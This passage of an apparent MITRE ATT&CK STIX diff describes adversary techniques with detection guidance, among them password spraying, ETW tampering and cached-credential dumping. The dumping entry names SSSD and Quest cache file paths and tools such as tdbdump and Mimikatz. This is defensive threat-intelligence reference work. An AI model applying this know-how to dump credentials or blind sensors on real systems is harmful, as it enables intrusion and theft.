"x_mitre_detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Process whitelisting", + "Anti-virus", + "Digital Certificate Validation" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "created": "2017-05-31T21:31:26.966Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1117", + "external_id": "T1117" + }, + { + "source_name": "Microsoft Regsvr32", + "description": "Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.", + "url": "https://support.microsoft.com/en-us/kb/249873" + }, + { + "source_name": "LOLBAS Regsvr32", + "description": "LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/" + }, + { + "source_name": "Carbon Black Squiblydoo Apr 2016", + "description": "Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo” Continues Trend of Attackers Using Native OS Tools to “Live off the Land”. Retrieved April 9, 2018.", + "url": "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/" + }, + { + "source_name": "FireEye Regsvr32 Targeting Mongolian Gov", + "description": "Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-07T14:33:34.201Z", + "name": "Password Spraying", + "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Microsoft Threat Intelligence Center (MSTIC)", + "John Strand" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.\n\nConsider the following event IDs:(Citation: Trimarc Detecting Password Spraying)\n\n* Domain Controllers: \"Audit Logon\" (Success & Failure) for event ID 4625.\n* Domain Controllers: \"Audit Kerberos Authentication Service\" (Success & Failure) for event ID 4771.\n* All systems: \"Audit Logon\" (Success & Failure) for event ID 4648.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers", + "Network" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "created": "2020-02-11T18:39:25.122Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1110/003", + "external_id": "T1110.003" + }, + { + "source_name": "Trimarc Detecting Password Spraying", + "description": "Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password Spraying with Security Event Auditing. Retrieved January 16, 2019.", + "url": "https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing" + }, + { + "source_name": "BlackHillsInfosec Password Spraying", + "description": "Thyer, J. (2015, October 30). Password Spraying & Other Fun with RPCCLIENT. Retrieved April 25, 2017.", + "url": "http://www.blackhillsinfosec.com/?p=4645" + }, + { + "source_name": "US-CERT TA18-068A 2018", + "description": "US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:19:08.953Z", + "name": "External Proxy", + "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "created": "2020-03-14T23:12:18.466Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1090/002", + "external_id": "T1090.002" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Trend Micro APT Attack Tools", + "description": "Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools of the Trade. Retrieved December 2, 2015.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:46.711Z", + "name": "Web Portal Capture", + "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "An externally facing login portal is configured." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "created": "2020-02-11T18:59:50.058Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1056/003", + "external_id": "T1056.003" + }, + { + "source_name": "Volexity Virtual Private Keylogging", + "description": "Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.", + "url": "https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-21T14:30:10.979Z", + "name": "Email Addresses", + "description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.(Citation: GitHub Office 365 User Enumeration)(Citation: Azure Active Directory Reconnaisance)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Brute Force](https://attack.mitre.org/techniques/T1110) via [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jannie Li, Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262", + "created": "2020-10-02T14:56:24.866Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1589/002", + "external_id": "T1589.002" + }, + { + "source_name": "Azure Active Directory Reconnaisance", + "description": "Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.", + "url": "https://o365blog.com/post/just-looking/" + }, + { + "source_name": "GitHub Office 365 User Enumeration", + "description": "gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022.", + "url": "https://github.com/gremwell/o365enum" + }, + { + "source_name": "GrimBlog UsernameEnum", + "description": "GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.", + "url": "https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/" + }, + { + "source_name": "HackersArise Email", + "description": "Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved October 20, 2020.", + "url": "https://www.hackers-arise.com/email-scraping-and-maltego" + }, + { + "source_name": "CNET Leaks", + "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.", + "url": "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Re-opened Applications", + "description": "Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6a3be63a-64c5-4678-a036-03ff8fc35300", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1164", + "external_id": "T1164" + }, + { + "source_name": "Methods of Mac Malware Persistence", + "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Indicator Blocking", + "description": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).\n\nETW interruption can be achieved multiple ways, however most directly by defining conditions using the PowerShell Set-EtwTraceProvider cmdlet or by interfacing directly with the registry to make alterations.\n\nIn the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Rob Smith" + ], + "x_mitre_detection": "Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.\n\nDepending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: HKLM\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\AUTOLOGGER_NAME\\{PROVIDER_GUID}\n\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Log analysis", + "Host intrusion prevention systems" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df", + "created": "2017-05-31T21:30:47.384Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1054", + "external_id": "T1054" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/571.html", + "external_id": "CAPEC-571" + }, + { + "source_name": "Microsoft Lamin Sept 2017", + "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A" + }, + { + "source_name": "Microsoft About Event Tracing 2018", + "description": "Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.", + "url": "https://docs.microsoft.com/en-us/windows/desktop/etw/consuming-events" + }, + { + "source_name": "Medium Event Tracing Tampering 2018", + "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved June 7, 2019.", + "url": "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-08T21:03:35.477Z", + "name": "Spearphishing Voice", + "description": "Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \"vishing\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)\n\nVictims may also receive phishing messages that direct them to call a phone number (\"callback phishing\") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nAdversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6a5d222a-a7e0-4656-b110-782c33098289", + "created": "2023-09-07T21:48:39.516Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1598/004", + "external_id": "T1598.004" + }, + { + "source_name": "Avertium callback phishing", + "description": "Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.", + "url": "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing" + }, + { + "source_name": "BOA Telephone Scams", + "description": "Bank of America. (n.d.). How to avoid telephone scams. Retrieved September 8, 2023.", + "url": "https://business.bofa.com/en-us/content/what-is-vishing.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Redundant Access", + "description": "**This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nAdversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated. \n\nIf one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary's tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.\n\nUse of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_deprecated": true, + "x_mitre_detection": "Existing methods of detecting remote access tools are helpful. Backup remote access tools or other access points may not have established command and control channels open during an intrusion, so the volume of data transferred may not be as high as the primary channel unless access is lost.\n\nDetection of tools based on beacon traffic, Command and Control protocol, or adversary infrastructure require prior threat intelligence on tools, IP addresses, and/or domains the adversary may use, along with the ability to detect use at the network boundary. Prior knowledge of indicators of compromise may also help detect adversary tools at the endpoint if tools are available to scan for those indicators.\n\nIf an intrusion is in progress and sufficient endpoint data or decoded command and control traffic is collected, then defenders will likely be able to detect additional tools dropped as the adversary is conducting the operation.\n\nFor alternative access using externally accessible VPNs or remote services, follow detection recommendations under [Valid Accounts](https://attack.mitre.org/techniques/T1078) and [External Remote Services](https://attack.mitre.org/techniques/T1133) to collect account use information.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS" + ], + "x_mitre_version": "3.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Network intrusion detection system", + "Anti-virus" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6aabc5ec-eae6-422c-8311-38d45ee9838a", + "created": "2017-05-31T21:31:18.867Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1108", + "external_id": "T1108" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Spearphishing Attachment", + "description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1193", + "external_id": "T1193" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/163.html", + "external_id": "CAPEC-163" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-18T23:47:54.553Z", + "name": "Cached Domain Credentials", + "description": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)\n\nOn Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)\n\nOn Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix) \n\nWith SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining 